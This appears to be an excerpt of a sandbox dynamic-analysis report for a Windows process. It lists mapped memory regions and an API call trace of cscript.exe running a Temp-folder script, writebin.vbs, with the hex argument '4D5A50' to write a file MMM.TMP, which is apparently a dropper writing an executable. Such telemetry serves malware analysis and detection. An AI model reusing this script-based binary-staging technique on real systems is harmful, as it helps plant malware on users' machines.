filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1861
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1862
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1863
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1864
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1865
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1866
start_va = 0xb0000
end_va = 0xfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 1867
start_va = 0x3e0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 1868
start_va = 0xb0000
end_va = 0xd8fff
monitored = 0
entry_point = 0xb1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1869
start_va = 0xf0000
end_va = 0xfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1870
start_va = 0x4e0000
end_va = 0x667fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004e0000"
filename = ""
Region:
id = 1871
start_va = 0xb0000
end_va = 0xd8fff
monitored = 0
entry_point = 0xb1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1872
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1873
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1874
start_va = 0x670000
end_va = 0x7f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 1875
start_va = 0x800000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 1876
start_va = 0xb0000
end_va = 0xb2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cscript.exe.mui"
filename = "\\Windows\\System32\\en-US\\cscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cscript.exe.mui")
Region:
id = 1877
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1878
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1879
start_va = 0x210000
end_va = 0x28cfff
monitored = 0
entry_point = 0x21cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1880
start_va = 0x210000
end_va = 0x28cfff
monitored = 0
entry_point = 0x21cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1881
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1882
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1883
start_va = 0x210000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1884
start_va = 0x1c00000
end_va = 0x1cdefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 1885
start_va = 0x1ce0000
end_va = 0x1ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 1886
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1887
start_va = 0x1de0000
end_va = 0x20aefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1888
start_va = 0x210000
end_va = 0x223fff
monitored = 1
entry_point = 0x2128c4
region_type = mapped_file
name = "cscript.exe"
filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")
Region:
id = 1889
start_va = 0x260000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1890
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1891
start_va = 0x21f0000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 1892
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1893
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1894
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1895
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1896
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1897
start_va = 0x7fef7860000
end_va = 0x7fef78f9fff
monitored = 1
entry_point = 0x7fef786e1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 1898
start_va = 0x230000
end_va = 0x230fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 1899
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1900
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1901
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1902
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1903
start_va = 0x20b0000
end_va = 0x20f4fff
monitored = 0
entry_point = 0x20b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1904
start_va = 0x20b0000
end_va = 0x20f4fff
monitored = 0
entry_point = 0x20b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1905
start_va = 0x20b0000
end_va = 0x20f4fff
monitored = 0
entry_point = 0x20b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1906
start_va = 0x20b0000
end_va = 0x20f4fff
monitored = 0
entry_point = 0x20b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1907
start_va = 0x20b0000
end_va = 0x20f4fff
monitored = 0
entry_point = 0x20b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1908
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1909
start_va = 0x230000
end_va = 0x230fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 1910
start_va = 0x2340000
end_va = 0x243ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 1911
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1912
start_va = 0x7fef79b0000
end_va = 0x7fef79bafff
monitored = 0
entry_point = 0x7fef79b1070
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll")
Region:
id = 1913
start_va = 0x2440000
end_va = 0x343ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002440000"
filename = ""
Region:
id = 1914
start_va = 0x240000
end_va = 0x240fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 1915
start_va = 0x3590000
end_va = 0x368ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003590000"
filename = ""
Region:
id = 1916
start_va = 0x7fef7840000
end_va = 0x7fef785cfff
monitored = 1
entry_point = 0x7fef7841070
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll")
Region:
id = 1917
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1918
start_va = 0x7fef4ae0000
end_va = 0x7fef4b7ffff
monitored = 0
entry_point = 0x7fef4b5eb20
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll")
Region:
id = 1919
start_va = 0x7feff730000
end_va = 0x7feff7c6fff
monitored = 0
entry_point = 0x7feff7313e8
region_type = mapped_file
name = "comdlg32.dll"
filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll")
Region:
id = 1920
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1921
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1922
start_va = 0x20b0000
end_va = 0x21dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020b0000"
filename = ""
Region:
id = 1923
start_va = 0x20b0000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020b0000"
filename = ""
Region:
id = 1924
start_va = 0x21d0000
end_va = 0x21dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 1925
start_va = 0x7fef7800000
end_va = 0x7fef783bfff
monitored = 1
entry_point = 0x7fef7801064
region_type = mapped_file
name = "scrobj.dll"
filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll")
Region:
id = 1926
start_va = 0x230000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 1927
start_va = 0x7fef43f0000
end_va = 0x7fef455efff
monitored = 0
entry_point = 0x7fef440355c
region_type = mapped_file
name = "msado15.dll"
filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")
Region:
id = 1928
start_va = 0x7fef77d0000
end_va = 0x7fef77f7fff
monitored = 0
entry_point = 0x7fef77d1adc
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll")
Region:
id = 1929
start_va = 0x3690000
end_va = 0x381ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003690000"
filename = ""
Region:
id = 1930
start_va = 0x3690000
end_va = 0x378ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003690000"
filename = ""
Region:
id = 1931
start_va = 0x37a0000
end_va = 0x381ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000037a0000"
filename = ""
Region:
id = 1932
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1933
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1934
start_va = 0x3920000
end_va = 0x3a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003920000"
filename = ""
Region:
id = 1935
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1936
start_va = 0x3b70000
end_va = 0x3c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b70000"
filename = ""
Region:
id = 1937
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Thread:
id = 92
os_tid = 0xc3c
[0376.167] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9f0 | out: lpSystemTimeAsFileTime=0x20f9f0*(dwLowDateTime=0xf8472700, dwHighDateTime=0x1dab598))
[0376.167] GetCurrentProcessId () returned 0xc38
[0376.167] GetCurrentThreadId () returned 0xc3c
[0376.168] GetTickCount () returned 0x1426492
[0376.168] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9f8 | out: lpPerformanceCount=0x20f9f8*=2125686494043) returned 1
[0376.168] GetModuleHandleA (lpModuleName=0x0) returned 0xfff30000
[0376.168] GetVersionExA (in: lpVersionInformation=0x20f8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20f8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.168] GetUserDefaultLCID () returned 0x409
[0376.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77660000
[0376.171] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadUILanguage") returned 0x776761e0
[0376.171] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0376.171] FreeLibrary (hLibModule=0x77660000) returned 1
[0376.172] GetCommandLineW () returned="cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\""
[0376.172] lstrlenW (lpString="cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"") returned 125
[0376.172] GetCurrentThreadId () returned 0xc3c
[0376.173] CoInitialize (pvReserved=0x0) returned 0x0
[0376.242] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f548 | out: phkResult=0x20f548*=0x88) returned 0x0
[0376.243] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f540 | out: phkResult=0x20f540*=0x8c) returned 0x0
[0376.243] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x20e848, lpData=0x20ec50, lpcbData=0x20e840*=0x400 | out: lpType=0x20e848*=0x0, lpData=0x20ec50*=0x1, lpcbData=0x20e840*=0x400) returned 0x2
[0376.243] RegQueryValueExW (in: hKey=0x88, lpValueName="Enabled", lpReserved=0x0, lpType=0x20e848, lpData=0x20ec50, lpcbData=0x20e840*=0x400 | out: lpType=0x20e848*=0x0, lpData=0x20ec50*=0x1, lpcbData=0x20e840*=0x400) returned 0x2
[0376.243] RegQueryValueExW (in: hKey=0x8c, lpValueName="Enabled", lpReserved=0x0, lpType=0x20e848, lpData=0x20ec50, lpcbData=0x20e840*=0x400 | out: lpType=0x20e848*=0x0, lpData=0x20ec50*=0x1, lpcbData=0x20e840*=0x400) returned 0x2
[0376.244] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0376.272] RegCloseKey (hKey=0x8c) returned 0x0
[0376.273] RegCloseKey (hKey=0x88) returned 0x0
[0376.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f260 | out: phkResult=0x20f260*=0x88) returned 0x0
[0376.273] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f258 | out: phkResult=0x20f258*=0x8c) returned 0x0
[0376.273] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x20e568, lpData=0x20e970, lpcbData=0x20e560*=0x400 | out: lpType=0x20e568*=0x0, lpData=0x20e970*=0x0, lpcbData=0x20e560*=0x400) returned 0x2
[0376.273] RegQueryValueExW (in: hKey=0x88, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x20e568, lpData=0x20e970, lpcbData=0x20e560*=0x400 | out: lpType=0x20e568*=0x0, lpData=0x20e970*=0x0, lpcbData=0x20e560*=0x400) returned 0x2
[0376.273] RegQueryValueExW (in: hKey=0x8c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x20e568, lpData=0x20e970, lpcbData=0x20e560*=0x400 | out: lpType=0x20e568*=0x0, lpData=0x20e970*=0x0, lpcbData=0x20e560*=0x400) returned 0x2
[0376.273] RegCloseKey (hKey=0x8c) returned 0x0
[0376.274] RegCloseKey (hKey=0x88) returned 0x0
[0376.274] GetACP () returned 0x4e4
[0376.274] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77660000
[0376.274] GetProcAddress (hModule=0x77660000, lpProcName="HeapSetInformation") returned 0x7767b8d0
[0376.274] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0376.274] FreeLibrary (hLibModule=0x77660000) returned 1
[0376.274] ??2@YAPEAX_K@Z () returned 0x3edef0
[0376.274] CoRegisterMessageFilter (in: lpMessageFilter=0x3edef0, lplpMessageFilter=0x3edf00 | out: lplpMessageFilter=0x3edf00*=0x0) returned 0x0
[0376.275] IUnknown:AddRef (This=0x3edef0) returned 0x2
[0376.275] GetModuleFileNameW (in: hModule=0xfff30000, lpFilename=0x20f5a0, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
[0376.275] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\cscript.exe", lpdwHandle=0x20eef0 | out: lpdwHandle=0x20eef0) returned 0x704
[0376.276] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\cscript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x20e7e0 | out: lpData=0x20e7e0) returned 1
[0376.276] VerQueryValueW (in: pBlock=0x20e7e0, lpSubBlock="\\", lplpBuffer=0x20eef8, puLen=0x20eef4 | out: lplpBuffer=0x20eef8*=0x20e808, puLen=0x20eef4) returned 1
[0376.276] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20ef48 | out: phkResult=0x20ef48*=0x88) returned 0x0
[0376.276] RegQueryValueExW (in: hKey=0x88, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x20e298, lpData=0x20e6a0, lpcbData=0x20e290*=0x400 | out: lpType=0x20e298*=0x0, lpData=0x20e6a0*=0x0, lpcbData=0x20e290*=0x400) returned 0x2
[0376.276] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x20ef00 | out: phkResult=0x20ef00*=0x8c) returned 0x0
[0376.277] RegQueryValueExW (in: hKey=0x8c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x20eec4, lpData=0x20ef40, lpcbData=0x20eec0*=0x4 | out: lpType=0x20eec4*=0x0, lpData=0x20ef40*=0x70, lpcbData=0x20eec0*=0x4) returned 0x2
[0376.277] RegQueryValueExW (in: hKey=0x8c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x20e298, lpData=0x20e6a0, lpcbData=0x20e290*=0x400 | out: lpType=0x20e298*=0x0, lpData=0x20e6a0*=0x0, lpcbData=0x20e290*=0x400) returned 0x2
[0376.277] RegQueryValueExW (in: hKey=0x88, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x20eec4, lpData=0x20ef40, lpcbData=0x20eec0*=0x4 | out: lpType=0x20eec4*=0x0, lpData=0x20ef40*=0x70, lpcbData=0x20eec0*=0x4) returned 0x2
[0376.277] RegQueryValueExW (in: hKey=0x88, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x20e298, lpData=0x20e6a0, lpcbData=0x20e290*=0x400 | out: lpType=0x20e298*=0x1, lpData="1", lpcbData=0x20e290*=0x4) returned 0x0
[0376.277] lstrlenW (lpString="1") returned 1
[0376.277] lstrlenW (lpString="0") returned 1
[0376.277] lstrlenW (lpString="1") returned 1
[0376.277] lstrlenW (lpString="no") returned 2
[0376.277] lstrlenW (lpString="1") returned 1
[0376.277] lstrlenW (lpString="false") returned 5
[0376.277] RegCloseKey (hKey=0x8c) returned 0x0
[0376.278] RegCloseKey (hKey=0x88) returned 0x0
[0376.278] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x20ef48, lpdwDisposition=0x0 | out: phkResult=0x20ef48*=0x88, lpdwDisposition=0x0) returned 0x0
[0376.278] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x20eee4, lpData=0x20ef40, lpcbData=0x20eee0*=0x4 | out: lpType=0x20eee4*=0x0, lpData=0x20ef40*=0x70, lpcbData=0x20eee0*=0x4) returned 0x2
[0376.278] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x20e2b8, lpData=0x20e6c0, lpcbData=0x20e2b0*=0x400 | out: lpType=0x20e2b8*=0x1, lpData="1", lpcbData=0x20e2b0*=0x4) returned 0x0
[0376.278] lstrlenW (lpString="1") returned 1
[0376.278] lstrlenW (lpString="0") returned 1
[0376.278] lstrlenW (lpString="1") returned 1
[0376.279] lstrlenW (lpString="no") returned 2
[0376.279] lstrlenW (lpString="1") returned 1
[0376.279] lstrlenW (lpString="false") returned 5
[0376.279] RegCloseKey (hKey=0x88) returned 0x0
[0376.279] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x20ef48, lpdwDisposition=0x0 | out: phkResult=0x20ef48*=0x88, lpdwDisposition=0x0) returned 0x0
[0376.279] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x20eee4, lpData=0x20ef40, lpcbData=0x20eee0*=0x4 | out: lpType=0x20eee4*=0x0, lpData=0x20ef40*=0x70, lpcbData=0x20eee0*=0x4) returned 0x2
[0376.279] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x20e2b8, lpData=0x20e6c0, lpcbData=0x20e2b0*=0x400 | out: lpType=0x20e2b8*=0x0, lpData=0x20e6c0*=0x31, lpcbData=0x20e2b0*=0x400) returned 0x2
[0376.279] RegCloseKey (hKey=0x88) returned 0x0
[0376.279] lstrlenW (lpString="B") returned 1
[0376.279] lstrlenW (lpString="D") returned 1
[0376.279] lstrlenW (lpString="E") returned 1
[0376.280] lstrlenW (lpString="H") returned 1
[0376.280] lstrlenW (lpString="I") returned 1
[0376.280] lstrlenW (lpString="Job") returned 3
[0376.280] lstrlenW (lpString="S") returned 1
[0376.280] lstrlenW (lpString="T") returned 1
[0376.280] lstrlenW (lpString="X") returned 1
[0376.280] lstrlenW (lpString="CP") returned 2
[0376.280] lstrlenW (lpString="logo") returned 4
[0376.280] lstrlenW (lpString="nologo") returned 6
[0376.280] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs") returned 49
[0376.280] lstrlenW (lpString="vbs") returned 3
[0376.280] lstrlenW (lpString="WSH") returned 3
[0376.280] ??2@YAPEAX_K@Z () returned 0x3edf20
[0376.280] memcpy (in: _Dst=0x20ea00, _Src=0x20f5a0, _Size=0x26 | out: _Dst=0x20ea00) returned 0x20ea00
[0376.281] LoadStringW (in: hInstance=0xfff30000, uID=0x7d1, lpBuffer=0x20d9b0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
[0376.281] LoadTypeLib (in: szFile="C:\\Windows\\system32\\cscript.exe", pptlib=0x20e9f0*=0x0 | out: pptlib=0x20e9f0*=0x30d440) returned 0x0
